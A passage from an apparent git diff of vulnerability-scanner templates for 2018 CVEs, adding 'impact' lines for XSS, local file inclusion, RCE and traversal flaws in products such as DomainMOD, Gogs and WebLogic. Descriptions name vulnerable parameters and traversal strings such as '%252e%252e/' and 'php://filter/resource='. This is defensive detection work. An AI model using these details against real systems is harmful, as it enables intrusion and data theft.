TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + impact: | + An attacker can access sensitive files, potentially leading to unauthorized disclosure of sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library. reference: diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index dd331fb52b..64b1389669 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: This issue will be fixed by updating to the latest version of Gogs. reference: - https://www.anquanke.com/post/id/163575 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 1ad9c457c0..92b0435e8e 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 444d0d5ac8..2d9c1fd8cd 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index a00f827d5f..bbf286ff38 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index b5596e6a16..9d63516626 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files. + impact: | + Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system. remediation: | Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 3bc4c1bd4b..2086807d13 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information. remediation: | Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index c8cf32bdcc..f0fc704e8f 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer. reference: diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 0b22244cc8..389386fc8e 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking or unauthorized actions. remediation: Fixed in later versions including 5.4. reference: - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 5740248ca0..d6b6b8239c 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 2e976b03d9..df836c9fe5 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 660a41d241..c66fbbd968 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 23683ce194..a39e661b52 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index d2613321b6..202566e440 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system. remediation: | Upgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 1288f9a019..6b3887ff83 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 2a0220487a..89805135bd 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 0a2ea63978..59b16c7d8c 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the necessary patches to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 23c58dc254..f49c568274 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD (>=4.11.02) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index d4f809c7e3..5074b2d47c 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 3e6c0186dc..f76142ba02 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 96fc7edf6a..c4c983e247 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index 3553bcee82..d5ab052e3d 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress JSmol2WP plugin (1.08 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index c8cb6a933e..780e67c876 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of the JSmol2WP plugin (>=1.08) or remove the plugin if it is not necessary. reference: diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 4b7b77f79f..a4423ff93d 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro. reference: diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 5f4fcf7284..f3293810d6 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads. reference: diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 2b37f2e880..4a405e6d7f 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI. + impact: | + The vulnerability can lead to the exposure of sensitive information, such as server configuration details. remediation: | Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 112dfd0b74..f4e6ea58c8 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 53df56cad1..f355469d35 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + impact: | + The vulnerability allows an attacker to include local files and execute arbitrary code on the server. remediation: | Update to the latest version of WordPress Payeezy Pay plugin. reference: diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 25239d8627..6e59b045d6 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or a complete system compromise. remediation: | Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet. reference: diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index b7b9fac828..9e8517289b 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -5,6 +5,8 @@ info: author: madrobot,leovalcante severity: high description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches provided by Oracle to address this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index e08a3145a0..fe426d4785 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 155180cdf3..fdb62d57fe 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 08a4134021..0f28e71dc1 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: medium description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patches and updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index a3998b8bfb..ffd3e4576b 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the node-srv application. reference: diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 364fd0adf1..352bafd846 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. + impact: | + This vulnerability can lead to unauthorized access to sensitive files and information stored on the server. remediation: | Apply the latest security patches and updates for Ruby On Rails framework to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 6015f58d35..195b21a579 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. + impact: | + An attacker can bypass authentication and gain unauthorized access to the affected WordPress site. remediation: | Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 0b1fb91c96..1d63d30ec1 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index 7cd3557aab..edda5b7948 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress SagePay Server Gateway for WooCommerce plugin (1.0.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 4838050190..d5b92650e4 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 3ebfdbd1d3..ea99700b92 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 51685d4f02..e64488abae 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 7202a33a02..245a5bbf3f 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index a7cc520681..2038f5c5c0 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 920a4ac028..93bae2cb30 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php + impact: | + An attacker can use the disclosed path 